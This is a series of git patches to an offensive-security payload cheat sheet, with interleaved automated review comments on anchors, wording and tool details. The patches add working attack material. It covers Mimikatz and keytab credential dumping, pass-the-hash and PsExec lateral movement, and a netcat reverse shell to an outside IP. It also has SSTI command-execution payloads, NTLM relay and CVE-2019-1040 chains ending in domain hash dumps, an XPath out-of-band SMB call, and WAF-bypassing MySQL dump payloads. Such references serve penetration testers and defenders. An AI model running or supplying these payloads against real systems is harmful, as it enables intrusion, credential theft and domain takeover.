+ 4 files changed, 97 insertions(+), 24 deletions(-) diff --git a/Methodology and Resources/Active Directory Attack.md b/Methodology and Resources/Active Directory Attack.md index af91b3fa..3140024c 100644 --- a/Methodology and Resources/Active Directory Attack.md +++ b/Methodology and Resources/Active Directory Attack.md @@ -13,6 +13,7 @@ * Using vssadmin * Using DiskShadow * Using Mimikatz DCSync + * Using Mimikatz sekurlsa * [Password in AD User comment](#password-in-ad-user-comment) * [Pass-the-Ticket Golden Tickets](#pass-the-ticket-golden-tickets) * [Pass-the-Ticket Silver Tickets](#pass-the-ticket-silver-tickets) 
@@ -28,6 +29,7 @@ * [Resource-Based Constrained Delegation](#resource-based-constrained-delegation) * [PrivExchange attack](#privexchange-attack) * [Password spraying](#password-spraying) + * [Extract accounts from /etc/krb5.keytab](#extract-accounts-from-etc-krb5-keytab) * [PXE Boot image attack](#pxe-boot-image-attack) ## Tools @@ -393,6 +395,15 @@ mimikatz# lsadump::dcsync /domain:htb.local /user:krbtgt :warning: Read-Only Domain Controllers are not allowed to pull password data for users by default. +#### Using Mimikatz sekurlsa + +Dumps credential data in an Active Directory domain when run on a Domain Controller. +:warning: Requires administrator access with debug or Local SYSTEM rights + +```powershell +sekurlsa::krbtgt +lsadump::lsa /inject /name:krbtgt +``` ### Password in AD User comment @@ -902,6 +913,30 @@ Most of the time the best passwords to spray are : - Welcome1 - $Companyname1 +### Extract accounts from /etc/krb5.keytab + +The service keys used by services that run as root are usually stored in the keytab file /etc/krb5.keytab. This service key is the equivalent of the service's password, and must be kept secure. + +Use [`klist`](https://adoptopenjdk.net/?variant=openjdk13&jvmVariant=hotspot) to read the keytab file and parse its content. The key that you see when the [key type](https://cwiki.apache.org/confluence/display/DIRxPMGT/Kerberos+EncryptionKey) is 23 is the actual NT Hash of the user. + +```powershell +$ klist.exe -t -K -e -k FILE:C:\Users\User\downloads\krb5.keytab +[...] +[26] Service principal: host/COMPUTER@DOMAIN + KVNO: 25 + Key type: 23 + Key: 6b3723410a3c54692e400a5862256e0a + Time stamp: Oct 07, 2019 09:12:02 +[...] +``` + +Connect to the machine using the account and the hash with CME. + +```powershell +$ crackmapexec 10.XXX.XXX.XXX -u 'COMPUTER$' -H "6b3723410a3c54692e400a5862256e0a" -d "DOMAIN" +CME 10.XXX.XXX.XXX:445 HOSTNAME-01 [+] DOMAIN\COMPUTER$ 6b3723410a3c54692e400a5862256e0a +``` + ### PXE Boot image attack 
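Review bot: the new summary entry `* [Extract accounts from /etc/krb5.keytab](#extract-accounts-from-etc-krb5-keytab)` will not resolve on GitHub: heading anchors drop punctuation such as `/` and `.` instead of turning it into hyphens, so `### Extract accounts from /etc/krb5.keytab` gets the anchor `#extract-accounts-from-etckrb5keytab`.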
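Review bot: the `### Extract accounts from /etc/krb5.keytab` hunk should say that the `klist` it links to is the JDK's `klist` (the link goes to AdoptOpenJDK and `klist.exe -t -K -e -k FILE:...` is its option syntax): the `klist.exe` shipped with Windows only manages the logon session's ticket cache and does not read keytab files, so a reader who reaches for the built-in tool will get an error. It is also worth stating, next to `Key type: 23`, that the key only equals the NT hash for that RC4 type; the AES key types listed by the same command are not reusable that way.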
@@ -1005,4 +1040,6 @@ PXE allows a workstation to boot from the network by retrieving an operating sys * [[PrivExchange] From user to domain admin in less than 60sec ! - davy](http://blog.randorisec.fr/privexchange-from-user-to-domain-admin-in-less-than-60sec/) * [Pass-the-Hash Is Dead: Long Live LocalAccountTokenFilterPolicy - March 16, 2017 - harmj0y](http://www.harmj0y.net/blog/redteaming/pass-the-hash-is-dead-long-live-localaccounttokenfilterpolicy/) * [Kerberos (II): How to attack Kerberos? - June 4, 2019 - ELOY PÉREZ](https://www.tarlogic.com/en/blog/how-to-attack-kerberos/) -* [Attacking Read-Only Domain Controllers (RODCs) to Own Active Directory - Sean Metcalf](https://adsecurity.org/?p=3592) \ No newline at end of file +* [Attacking Read-Only Domain Controllers (RODCs) to Own Active Directory - Sean Metcalf](https://adsecurity.org/?p=3592) +* [All you need to know about Keytab files - Pierre Audonnet [MSFT] - January 3, 2018](https://blogs.technet.microsoft.com/pie/2018/01/03/all-you-need-to-know-about-keytab-files/) +* [Taming the Beast Assess Kerberos-Protected Networks - Emmanuel Bouillon](https://www.blackhat.com/presentations/bh-europe-09/Bouillon/BlackHat-Europe-09-Bouillon-Taming-the-Beast-Kerberous-slides.pdf) \ No newline at end of file diff --git a/Methodology and Resources/Windows - Mimikatz.md b/Methodology and Resources/Windows - Mimikatz.md index 9e1f8696..6e28b25f 100644 --- a/Methodology and Resources/Windows - Mimikatz.md +++ b/Methodology and Resources/Windows - Mimikatz.md @@ -24,6 +24,10 @@ mimikatz # sekurlsa::wdigest ```powershell mimikatz_command -f sekurlsa::logonPasswords full mimikatz_command -f sekurlsa::wdigest + +# to re-enable wdigest in Windows Server 2012+ +# in HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\SecurityProviders\WDigest +# create a DWORD 'UseLogonCredential' with the value 1. ``` ## Mimikatz - Mini Dump 
@@ -108,3 +112,4 @@ More informations can be grabbed from the Memory with : - [Unofficial Guide to Mimikatz & Command Reference](https://adsecurity.org/?page_id=1821) - [Skeleton Key](https://pentestlab.blog/2018/04/10/skeleton-key/) +- [Reversing Wdigest configuration in Windows Server 2012 R2 and Windows Server 2016 - 5TH DECEMBER 2017 - ACOUCH](https://www.adamcouch.co.uk/reversing-wdigest-configuration-in-windows-server-2012-r2-and-windows-server-2016/) diff --git a/Methodology and Resources/Windows - Using credentials.md b/Methodology and Resources/Windows - Using credentials.md index 17f22cf5..67b3823c 100644 --- a/Methodology and Resources/Windows - Using credentials.md +++ b/Methodology and Resources/Windows - Using credentials.md @@ -1,6 +1,25 @@ # Windows - Using credentials -## TIP 1 - Create your credential :D +## Summary + +* [TIPS](#tips) + * [TIP 1 - Create your credential](#tip-1-create-your-credential) + * [TIP 2 - Retail Credential](#tip-2-retail-credential) + * [TIP 3 - Sandbox Credential - WDAGUtilityAccount](#tip-3-sandbox-credrential-wdagutilityaccount) +* [Metasploit](#metasploit) + * [Metasploit - SMB](#metasploit-smb) + * [Metasploit - Psexec](#metasploit-psexec) +* [Crackmapexec](#crackmapexec) +* [Winexe](#winexe) +* [Psexec.py / Smbexec.py / Wmiexec.py](#psexec.py---smbexec.py---wmiexec.py) +* [PsExec - Sysinternal](#psexec-sysinternal) +* [RDP Remote Desktop Protocol](#rdp-remote-desktop-protocol) +* [Netuse](#netuse) +* [Runas](#runas) + +## TIPS + +### TIP 1 - Create your credential ```powershell net user hacker hacker1234* /add @@ -17,7 +36,9 @@ net user /dom net user /domain ``` -## TIP 2 - Retail Credential [@m8urnett on Twitter](https://twitter.com/m8urnett/status/1003835660380172289) +### TIP 2 - Retail Credential + +Retail Credential [@m8urnett on Twitter](https://twitter.com/m8urnett/status/1003835660380172289) when you run Windows in retail demo mode, it creates a user named Darrin DeYoung and an admin RetailAdmin 
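Review bot: most anchors in the new `## Summary` of `Windows - Using credentials.md` will not resolve on GitHub. Heading anchors keep hyphens and turn every space into a hyphen, so `### TIP 1 - Create your credential` becomes `#tip-1---create-your-credential` (three hyphens), and likewise `#metasploit---smb`, `#metasploit---psexec` and `#psexec---sysinternal`; dots are dropped, so `## Psexec.py / Smbexec.py / Wmiexec.py` becomes `#psexecpy--smbexecpy--wmiexecpy`; and the TIP 3 entry links to `#tip-3-sandbox-credrential-wdagutilityaccount`, which misspells `credential` on top of the hyphen problem. Copy the anchors from the rendered page rather than writing them by hand.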
@@ -26,7 +47,9 @@ Username: RetailAdmin Password: trs10 ``` -## TIP - Sandbox Credential - WDAGUtilityAccount - [@never_released on Twitter](https://twitter.com/never_released/status/1081569133844676608) +### TIP 3 - Sandbox Credential - WDAGUtilityAccount + +WDAGUtilityAccount - [@never_released on Twitter](https://twitter.com/never_released/status/1081569133844676608) Starting with Windows 10 version 1709 (Fall Creators Update), it is part of Windows Defender Application Guard @@ -37,7 +60,9 @@ Password: pw123 ``` -## Metasploit - SMB +## Metasploit + +### Metasploit - SMB ```c use auxiliary/scanner/smb/smb_login @@ -49,7 +74,7 @@ run creds ``` -## Metasploit - Psexec +### Metasploit - Psexec Note: the password can be replaced by a hash to execute a `pass the hash` attack. @@ -63,27 +88,27 @@ run shell ``` -## Crackmapexec (Integrated to Kali) +## Crackmapexec ```python git clone https://github.com/byt3bl33d3r/CrackMapExec.github python crackmapexec.py 10.9.122.0/25 -d DOMAIN -u username -p password python crackmapexec.py 10.10.10.10 -d DOMAIN -u username -p password -x whoami -``` - -## Crackmapexec (Pass The Hash) - -```powershell +# pass the hash cme smb 172.16.157.0/24 -u administrator -H 'aad3b435b51404eeaad3b435b51404ee:5509de4ff0a6eed7048d9f4a61100e51' --local-auth ``` -## Winexe (Integrated to Kali) +## Winexe + +Integrated to Kali ```python winexe -U DOMAIN/username%password //10.10.10.10 cmd.exe ``` -## Psexec.py / Smbexec.py / Wmiexec.py (Impacket) +## Psexec.py / Smbexec.py / Wmiexec.py + +from Impacket ```python git clone https://github.com/CoreSecurity/impacket.git 
@@ -95,7 +120,16 @@ python wmiexec.py DOMAIN/username:password@10.10.10.10 # switch admin user to NT Authority/System ``` -## RDP Remote Desktop Protocol (Impacket) +## PsExec - Sysinternal + +from Windows - [Sysinternal](https://docs.microsoft.com/en-us/sysinternals/downloads/sysinternals-suite) + +```powershell +PsExec.exe \\ordws01.cscou.lab -u DOMAIN\username -p password cmd.exe +PsExec.exe \\ordws01.cscou.lab -u DOMAIN\username -p password cmd.exe -s # get System shell +``` + +## RDP Remote Desktop Protocol ```powershell python rdpcheck.py DOMAIN/username:password@10.10.10.10 @@ -139,24 +173,20 @@ xfreerdp /u:offsec /d:win2012 /pth:88a405e17c0aa5debbc9b5679753939d /v:10.0.0.1 ``` -## Netuse (Windows) +## Netuse + +Windows only ```powershell net use \\ordws01.cscou.lab /user:DOMAIN\username password C$ ``` -## Runas (Windows - Kerberos auth) +## Runas ```powershell runas /netonly /user:DOMAIN\username "cmd.exe" -``` - -## PsExec (Windows - [Sysinternal](https://docs.microsoft.com/en-us/sysinternals/downloads/sysinternals-suite) ) - -```powershell -PsExec.exe \\ordws01.cscou.lab -u DOMAIN\username -p password cmd.exe -PsExec.exe \\ordws01.cscou.lab -u DOMAIN\username -p password cmd.exe -s # get System shell +runas /noprofil /netonly /user:DOMAIN\username cmd.exe ``` ## References diff --git a/Server Side Template Injection/README.md b/Server Side Template Injection/README.md index 1ac3ac95..71aa5ad8 100644 --- a/Server Side Template Injection/README.md +++ b/Server Side Template Injection/README.md @@ -288,6 +288,7 @@ nv -lnvp 8000 ```python {{''.__class__.mro()[1].__subclasses__()[396]('cat flag.txt',shell=True,stdout=-1).communicate()[0].strip()}} +{{config.__class__.__init__.__globals__['os'].popen('ls').read()}} ``` #### Exploit the SSTI by calling Popen without guessing the offset From b54142c3a29410a7ee19130f80b1b7c6f07a7b85 Mon Sep 17 00:00:00 2001 
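Review bot: the added line `runas /noprofil /netonly /user:DOMAIN\username cmd.exe` misspells the switch; `runas` documents it as `/noprofile`. In the `## PsExec - Sysinternal` block moved up by the same hunk, `from Windows - [Sysinternal](...)` is a sentence fragment and the suite is named `Sysinternals`; a line such as `PsExec from the Windows Sysinternals suite` reads cleanly.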
From: Hi15358 Date: Mon, 21 Oct 2019 02:35:13 +0800 Subject: [PATCH 073/222] Update Reverse Shell Cheatsheet.md --- Methodology and Resources/Reverse Shell Cheatsheet.md | 1 + 1 file changed, 1 insertion(+) diff --git a/Methodology and Resources/Reverse Shell Cheatsheet.md b/Methodology and Resources/Reverse Shell Cheatsheet.md index 57e24be4..cf91cc25 100644 --- a/Methodology and Resources/Reverse Shell Cheatsheet.md +++ b/Methodology and Resources/Reverse Shell Cheatsheet.md @@ -129,6 +129,7 @@ echo 'package main;import"os/exec";import"net";func main(){c,_:=net.Dial("tcp"," ```bash nc -e /bin/sh [IPADDR] [PORT] nc.traditional -e /bin/bash 10.0.0.1 4444 +nc -c bash 10.0.0.1 4444 ``` ### Netcat OpenBsd From 11fc6e4bc5c283a3b0bf0517d7a72f63956d1e41 Mon Sep 17 00:00:00 2001 From: Swissky <12152583+swisskyrepo@users.noreply.github.com> Date: Sun, 20 Oct 2019 22:09:36 +0200 Subject: [PATCH 074/222] NTLM relay + MS08-068 --- .../Active Directory Attack.md | 57 ++++++++++++++++++- 1 file changed, 55 insertions(+), 2 deletions(-) diff --git a/Methodology and Resources/Active Directory Attack.md b/Methodology and Resources/Active Directory Attack.md index 3140024c..7685d9c9 100644 --- a/Methodology and Resources/Active Directory Attack.md +++ b/Methodology and Resources/Active Directory Attack.md @@ -23,6 +23,8 @@ * [OverPass-the-Hash (pass the key)](#overpass-the-hash-pass-the-key) * [Capturing and cracking NTLMv2 hashes](#capturing-and-cracking-ntlmv2-hashes) * [NTLMv2 hashes relaying](#ntlmv2-hashes-relaying) + * [MS08-068 NTLM reflection](#ms08-068-ntlm-reflection) + * [SMB Signing Disabled](#smb-signing-disabled) * [Dangerous Built-in Groups Usage](#dangerous-built-in-groups-usage) * [Trust relationship between domains](#trust-relationship-between-domains) * [Unconstrained delegation](#unconstrained-delegation) 
@@ -658,12 +660,62 @@ hashcat -m 5600 -a 0 hash.txt crackstation.txt ### NTLMv2 hashes relaying +NTLMv1 and NTLMv2 can be relayed to connect to another machine. + +| Hash | Hashcat | Attack method | +|---|---|---| +| LM | 3000 | crack/pass the hash | +| NTLM/NTHash | 1000 | crack/pass the hash | +| NTLMv1/Net-NTLMv1 | 5500 | crack/relay attack | +| NTLMv2/Net-NTLMv2 | 5600 | crack/relay attack | + +#### MS08-068 NTLM reflection + +NTLM reflection vulnerability in the SMB protocolOnly targeting Windows 2000 to Windows Server 2008. + +> This vulnerability allows an attacker to redirect an incoming SMB connection back to the machine it came from and then access the victim machine using the victim’s own credentials. + +* https://github.com/SecWiki/windows-kernel-exploits/tree/master/MS08-068 + +```powershell +msf > use exploit/windows/smb/smb_relay +msf exploit(smb_relay) > show targets +``` + +#### SMB Signing Disabled + If a machine has `SMB signing`:`disabled`, it is possible to use Responder with Multirelay.py script to perform an `NTLMv2 hashes relay` and get a shell access on the machine. 1. Open the Responder.conf file and set the value of `SMB` and `HTTP` to `Off`. + ```powershell + [Responder Core] + ; Servers to start + ... + SMB = Off # Turn this off + HTTP = Off # Turn this off + ``` 2. Run `python RunFinger.py -i IP_Range` to detect machine with `SMB signing`:`disabled`. 3. Run `python Responder.py -I ` and `python MultiRelay.py -t -u ALL` -4. Wait for a shell +4. Also you can use `ntlmrelayx` to dump the SAM database of the targets in the list. + ```powershell + ntlmrelayx.py -tf targets.txt + ``` +5. ntlmrelayx can also act as a SOCK proxy with every compromised sessions. 
+ ```powershell + $ ntlmrelayx.py -tf /tmp/targets.txt -socks -smb2support + [*] Servers started, waiting for connections + Type help for list of commands + ntlmrelayx> socks + Protocol Target Username Port + -------- -------------- ------------------------ ---- + MSSQL 192.168.48.230 VULNERABLE/ADMINISTRATOR 1433 + SMB 192.168.48.230 CONTOSO/NORMALUSER1 445 + MSSQL 192.168.48.230 CONTOSO/NORMALUSER1 1433 + + $ proxychains smbclient //192.168.48.230/Users -U contoso/normaluser1 + $ proxychains mssqlclient.py contoso/normaluser1@192.168.48.230 -windows-auth + ``` + ### Dangerous Built-in Groups Usage @@ -1042,4 +1094,5 @@ PXE allows a workstation to boot from the network by retrieving an operating sys * [Kerberos (II): How to attack Kerberos? - June 4, 2019 - ELOY PÉREZ](https://www.tarlogic.com/en/blog/how-to-attack-kerberos/) * [Attacking Read-Only Domain Controllers (RODCs) to Own Active Directory - Sean Metcalf](https://adsecurity.org/?p=3592) * [All you need to know about Keytab files - Pierre Audonnet [MSFT] - January 3, 2018](https://blogs.technet.microsoft.com/pie/2018/01/03/all-you-need-to-know-about-keytab-files/) -* [Taming the Beast Assess Kerberos-Protected Networks - Emmanuel Bouillon](https://www.blackhat.com/presentations/bh-europe-09/Bouillon/BlackHat-Europe-09-Bouillon-Taming-the-Beast-Kerberous-slides.pdf) \ No newline at end of file +* [Taming the Beast Assess Kerberos-Protected Networks - Emmanuel Bouillon](https://www.blackhat.com/presentations/bh-europe-09/Bouillon/BlackHat-Europe-09-Bouillon-Taming-the-Beast-Kerberous-slides.pdf) +* [Playing with Relayed Credentials - June 27, 2018](https://www.secureauth.com/blog/playing-relayed-credentials) \ No newline at end of file From 727eb5cabd2bf265813f0d0376912dc3c86c3acb Mon Sep 17 00:00:00 2001 
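Review bot: in the `#### MS08-068 NTLM reflection` hunk the sentence `NTLM reflection vulnerability in the SMB protocolOnly targeting Windows 2000 to Windows Server 2008.` is missing the sentence break before `Only`. In the `#### SMB Signing Disabled` steps, step 5 should read `SOCKS proxy` and `every compromised session`, and step 4 now replaces the original `4. Wait for a shell`, so the Responder/MultiRelay flow in step 3 no longer says what the reader should expect from it; keep the waiting step and number the `ntlmrelayx` alternatives after it. The hash table is a useful addition; its introductory line `NTLMv1 and NTLMv2 can be relayed` would be clearer as `NTLMv1 and NTLMv2 challenge-responses can be relayed`, matching the `Net-NTLMv1`/`Net-NTLMv2` rows.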
From: Swissky <12152583+swisskyrepo@users.noreply.github.com> Date: Mon, 21 Oct 2019 23:00:27 +0200 Subject: [PATCH 075/222] Drop the MIC --- .../Active Directory Attack.md | 36 ++++++++++++++++++- 1 file changed, 35 insertions(+), 1 deletion(-) diff --git a/Methodology and Resources/Active Directory Attack.md b/Methodology and Resources/Active Directory Attack.md index 7685d9c9..51d7003a 100644 --- a/Methodology and Resources/Active Directory Attack.md +++ b/Methodology and Resources/Active Directory Attack.md @@ -25,6 +25,7 @@ * [NTLMv2 hashes relaying](#ntlmv2-hashes-relaying) * [MS08-068 NTLM reflection](#ms08-068-ntlm-reflection) * [SMB Signing Disabled](#smb-signing-disabled) + * [Drop the MIC](#drop-the-mic) * [Dangerous Built-in Groups Usage](#dangerous-built-in-groups-usage) * [Trust relationship between domains](#trust-relationship-between-domains) * [Unconstrained delegation](#unconstrained-delegation) 
@@ -716,6 +717,37 @@ If a machine has `SMB signing`:`disabled`, it is possible to use Responder with $ proxychains mssqlclient.py contoso/normaluser1@192.168.48.230 -windows-auth ``` +#### Drop the MIC + +> The CVE-2019-1040 vulnerability makes it possible to modify the NTLM authentication packets without invalidating the authentication, and thus enabling an attacker to remove the flags which would prevent relaying from SMB to LDAP + +Check vulnerability with [cve-2019-1040-scanner](https://github.com/fox-it/cve-2019-1040-scanner) + +```powershell +python2 scanMIC.py 'DOMAIN/USERNAME:PASSWORD@TARGET' +[*] CVE-2019-1040 scanner by @_dirkjan / Fox-IT - Based on impacket by SecureAuth +[*] Target TARGET is not vulnerable to CVE-2019-1040 (authentication was rejected) +``` + +- Using any AD account, connect over SMB to a victim Exchange server, and trigger the SpoolService bug. The attacker server will connect back to you over SMB, which can be relayed with a modified version of ntlmrelayx to LDAP. Using the relayed LDAP authentication, grant DCSync privileges to the attacker account. The attacker account can now use DCSync to dump all password hashes in AD + ```powershell + TERM1> python printerbug.py testsegment.local/testuser@s2012exc.testsegment.local + TERM2> ntlmrelayx.py --remove-mic --escalate-user ntu -t ldap://s2016dc.testsegment.local -smb2support + TERM1> secretsdump.py testsegment/ntu@s2016dc.testsegment.local -just-dc + ``` + + +- Using any AD account, connect over SMB to the victim server, and trigger the SpoolService bug. The attacker server will connect back to you over SMB, which can be relayed with a modified version of ntlmrelayx to LDAP. Using the relayed LDAP authentication, grant Resource Based Constrained Delegation privileges for the victim server to a computer account under the control of the attacker. The attacker can now authenticate as any user on the victim server. 
+ ```powershell + # create a new machine account + TERM1> ntlmrelayx.py -t ldaps://rlt-dc.relaytest.local --remove-mic --delegate-access -smb2support + TERM2> python printerbug.py relaytest.local/testuser@second-dc-server 10.0.2.6 + TERM1> getST.py -spn host/second-dc-server.local 'relaytest.local/MACHINE$:PASSWORD' -impersonate DOMAIN_ADMIN_USER_NAME + + # connect using the ticket + export KRB5CCNAME=DOMAIN_ADMIN_USER_NAME.ccache + secretsdump.py -k -no-pass second-dc-server.local -just-dc + ``` ### Dangerous Built-in Groups Usage @@ -1095,4 +1127,6 @@ PXE allows a workstation to boot from the network by retrieving an operating sys * [Attacking Read-Only Domain Controllers (RODCs) to Own Active Directory - Sean Metcalf](https://adsecurity.org/?p=3592) * [All you need to know about Keytab files - Pierre Audonnet [MSFT] - January 3, 2018](https://blogs.technet.microsoft.com/pie/2018/01/03/all-you-need-to-know-about-keytab-files/) * [Taming the Beast Assess Kerberos-Protected Networks - Emmanuel Bouillon](https://www.blackhat.com/presentations/bh-europe-09/Bouillon/BlackHat-Europe-09-Bouillon-Taming-the-Beast-Kerberous-slides.pdf) -* [Playing with Relayed Credentials - June 27, 2018](https://www.secureauth.com/blog/playing-relayed-credentials) \ No newline at end of file +* [Playing with Relayed Credentials - June 27, 2018](https://www.secureauth.com/blog/playing-relayed-credentials) +* [Exploiting CVE-2019-1040 - Combining relay vulnerabilities for RCE and Domain Admin - Dirk-jan Mollema](https://dirkjanm.io/exploiting-CVE-2019-1040-relay-vulnerabilities-for-rce-and-domain-admin/) +* [Drop the MIC - CVE-2019-1040 - Marina Simakov - Jun 11, 2019](https://blog.preempt.com/drop-the-mic) \ No newline at end of file From c6b5bbab2b577d3a488abd451bd23cc858ce5b73 Mon Sep 17 00:00:00 2001 
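Review bot: Both bullet descriptions say `The attacker server will connect back to you over SMB`; after the SpoolService trigger it is the victim (the Exchange server in the first bullet, the victim server in the second) that connects back, so `attacker` should read `victim` in both. The block quote under `#### Drop the MIC` has no attribution; it comes from one of the two references added at the bottom of this patch and should name it inline. The prose still says `a modified version of ntlmrelayx` while the commands use `--remove-mic` as an ordinary flag; state which impacket version or branch provides the flag so readers do not go looking for a patch. In the second bullet the hostnames do not line up (`ldaps://rlt-dc.relaytest.local`, `second-dc-server 10.0.2.6`, `host/second-dc-server.local`, domain `relaytest.local`), so the three commands cannot be followed as one example; use one consistent FQDN. The scanner output shown is the patched case (`not vulnerable to CVE-2019-1040 (authentication was rejected)`); one line saying that this is what a host with the update installed returns would turn it into the check defenders want. The fences are `powershell` for Linux tooling; `bash` fits.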
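Review bot: The `Exploiting CVE-2019-1040 ... - Dirk-jan Mollema` entry has no date, unlike the `Drop the MIC ... - Jun 11, 2019` entry beside it and the rest of the list; add it.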
From: Alexandre ZANNI <16578570+noraj@users.noreply.github.com> Date: Tue, 22 Oct 2019 20:26:04 +0200 Subject: [PATCH 076/222] fix TOC links --- Server Side Request Forgery/README.md | 8 ++++---- 1 file changed, 4 insertions(+), 4 deletions(-) diff --git a/Server Side Request Forgery/README.md b/Server Side Request Forgery/README.md index 46070c93..b9c47aca 100644 --- a/Server Side Request Forgery/README.md +++ b/Server Side Request Forgery/README.md @@ -8,17 +8,17 @@ * [Payloads with localhost](#payloads-with-localhost) * [Bypassing filters](#bypassing-filters) * [Bypass using HTTPS](#bypass-using-https) - * [Bypass localhost with [::]](#bypass-localhost-with----) + * [Bypass localhost with [::]](#bypass-localhost-with-) * [Bypass localhost with a domain redirection](#bypass-localhost-with-a-domain-redirection) * [Bypass localhost with CIDR](#bypass-localhost-with-cidr) * [Bypass using a decimal IP location](#bypass-using-a-decimal-ip-location) - * [Bypass using IPv6/IPv4 Address Embedding](#bypass-using-ipv6-ipv4-address-embedding) + * [Bypass using IPv6/IPv4 Address Embedding](#bypass-using-ipv6ipv4-address-embedding) * [Bypass using malformed urls](#bypass-using-malformed-urls) * [Bypass using rare address](#bypass-using-rare-address) * [Bypass using bash variables](#bypass-using-bash-variables) * [Bypass using tricks combination](#bypass-using-tricks-combination) * [Bypass using enclosed alphanumerics](#bypass-using-enclosed-alphanumerics) - * [Bypass filter_var() php function](#bypass-filter-var-php-function) + * [Bypass filter_var() php function](#bypass-filter_var-php-function) * [Bypass against a weak parser](#bypass-against-a-weak-parser) * [SSRF exploitation via URL Scheme](#ssrf-exploitation-via-url-scheme) * [file://](#file) 
@@ -668,4 +668,4 @@ More info: https://rancher.com/docs/rancher/v1.6/en/rancher-services/metadata-se - [PortSwigger - Web Security Academy Server-side request forgery (SSRF)](https://portswigger.net/web-security/ssrf) - [SVG SSRF Cheatsheet - Allan Wirth (@allanlw) - 12/06/2019](https://github.com/allanlw/svg-cheatsheet) - [SSRF’s up! Real World Server-Side Request Forgery (SSRF) - shorebreaksecurity - 2019](https://www.shorebreaksecurity.com/blog/ssrfs-up-real-world-server-side-request-forgery-ssrf/) -- [challenge 1: COME OUT, COME OUT, WHEREVER YOU ARE!](https://www.kieranclaessens.be/cscbe-web-2018.html) \ No newline at end of file +- [challenge 1: COME OUT, COME OUT, WHEREVER YOU ARE!](https://www.kieranclaessens.be/cscbe-web-2018.html) From 88f020381ddcefc96a3fb9125fa398b6f74ba76a Mon Sep 17 00:00:00 2001 From: Swissky <12152583+swisskyrepo@users.noreply.github.com> Date: Tue, 22 Oct 2019 23:06:35 +0200 Subject: [PATCH 077/222] Out of band XPATH --- XPATH Injection/README.md | 27 +++++++++++++++++++++------ 1 file changed, 21 insertions(+), 6 deletions(-) diff --git a/XPATH Injection/README.md b/XPATH Injection/README.md index 4b2eddc4..12bb05e4 100644 --- a/XPATH Injection/README.md +++ b/XPATH Injection/README.md @@ -1,6 +1,13 @@ # XPATH injection -XPath Injection is an attack technique used to exploit applications that construct XPath (XML Path Language) queries from user-supplied input to query or navigate XML documents. +> XPath Injection is an attack technique used to exploit applications that construct XPath (XML Path Language) queries from user-supplied input to query or navigate XML documents. + +## Summary + +* [Exploitation](#exploitation) +* [Blind exploitation](#blind-exploitation) +* [Out Of Band Exploitation](#out-of-band-exploitation) +* [References](#references) ## Exploitation 
@@ -24,16 +31,24 @@ x' or name()='username' or 'x'='y ## Blind Exploitation -```sql 1. Size of a string -and string-length(account)=SIZE_INT - + ```sql + and string-length(account)=SIZE_INT + ``` 2. Extract a character -substring(//user[userid=5]/username,2,1)=CHAR_HERE -substring(//user[userid=5]/username,2,1)=codepoints-to-string(INT_ORD_CHAR_HERE) + ```sql + substring(//user[userid=5]/username,2,1)=CHAR_HERE + substring(//user[userid=5]/username,2,1)=codepoints-to-string(INT_ORD_CHAR_HERE) + ``` + +## Out Of Band Exploitation + +```powershell +http://example.com/?title=Foundation&type=*&rent_days=* and doc('//10.10.10.10/SHARE') ``` ## References * [OWASP XPATH Injection](https://www.owasp.org/index.php/Testing_for_XPath_Injection_(OTG-INPVAL-010)) * [XPATH Blind Explorer](http://code.google.com/p/xpath-blind-explorer/) +* [Places of Interest in Stealing NetNTLM Hashes - Osanda Malith Jayathissa - March 24, 2017](https://osandamalith.com/2017/03/24/places-of-interest-in-stealing-netntlm-hashes/) From 5b59da70f7dfe4b091c2b33d9d97ab74b9f0bdeb Mon Sep 17 00:00:00 2001 From: nizam0906 Date: Fri, 25 Oct 2019 18:11:11 +0530 Subject: [PATCH 078/222] Update MySQL Injection.md Added 6 MYSQL DIOS * Zen * Zen WAF * ~tr0jAn WAF * ~tr0jAn Benchmark * N1Z4M * sharik --- SQL Injection/MySQL Injection.md | 20 +++++++++++++++++++- 1 file changed, 19 insertions(+), 1 deletion(-) diff --git a/SQL Injection/MySQL Injection.md b/SQL Injection/MySQL Injection.md index 6574bb05..f61cc52b 100644 --- a/SQL Injection/MySQL Injection.md +++ b/SQL Injection/MySQL Injection.md 
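Review bot: Turning the opening definition into a `>` block quote implies a source, but none is given; the OWASP page already in `## References` is the obvious one and should be named next to the quote.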
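Review bot: The Out Of Band example `and doc('//10.10.10.10/SHARE')` depends on the XPath 2.0 / XQuery `doc()` function, which XPath 1.0 engines (libxml2-based ones, for instance) do not provide, and `codepoints-to-string()` in the blind section has the same prerequisite; say so, since it is the first thing to establish. The section also never states what the call does: it makes the XML processor open a UNC path, so the observable effect is an outbound SMB connection from the server (the NetNTLM-hash angle of the new reference), which is also what a defender would look for in egress logs. The `powershell` fence around a URL is wrong; a plain fence or `http` reads better.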
@@ -266,6 +266,24 @@ make_set(6,@:=0x0a,(select(1)from(information_schema.columns)where@:=make_set(51 -- M@dBl00d (Select export_set(5,@:=0,(select count(*)from(information_schema.columns)where@:=export_set(5,export_set(5,@,table_name,0x3c6c693e,2),column_name,0xa3a,2)),@,2)) + +-- Zen ++make_set(6,@:=0x0a,(select(1)from(information_schema.columns)where@:=make_set(511,@,0x3c6c693e,table_name,column_name)),@) + +-- Zen WAF +(/*!12345sELecT*/(@)from(/*!12345sELecT*/(@:=0x00),(/*!12345sELecT*/(@)from(`InFoRMAtiON_sCHeMa`.`ColUMNs`)where(`TAblE_sCHemA`=DatAbAsE/*data*/())and(@)in(@:=CoNCat%0a(@,0x3c62723e5461626c6520466f756e64203a20,TaBLe_nAMe,0x3a3a,column_name))))a) + +-- ~tr0jAn WAF ++concat/*!(unhex(hex(concat/*!(0x3c2f6469763e3c2f696d673e3c2f613e3c2f703e3c2f7469746c653e,0x223e,0x273e,0x3c62723e3c62723e,unhex(hex(concat/*!(0x3c63656e7465723e3c666f6e7420636f6c6f723d7265642073697a653d343e3c623e3a3a207e7472306a416e2a2044756d7020496e204f6e652053686f74205175657279203c666f6e7420636f6c6f723d626c75653e28574146204279706173736564203a2d20207620312e30293c2f666f6e743e203c2f666f6e743e3c2f63656e7465723e3c2f623e))),0x3c62723e3c62723e,0x3c666f6e7420636f6c6f723d626c75653e4d7953514c2056657273696f6e203a3a20,version(),0x7e20,@@version_comment,0x3c62723e5072696d617279204461746162617365203a3a20,@d:=database(),0x3c62723e44617461626173652055736572203a3a20,user(),(/*!12345selEcT*/(@x)/*!from*/(/*!12345selEcT*/(@x:=0x00),(@r:=0),(@running_number:=0),(@tbl:=0x00),(/*!12345selEcT*/(0) from(information_schema./**/columns)where(table_schema=database()) and(0x00)in(@x:=Concat/*!(@x, 0x3c62723e, if( (@tbl!=table_name), 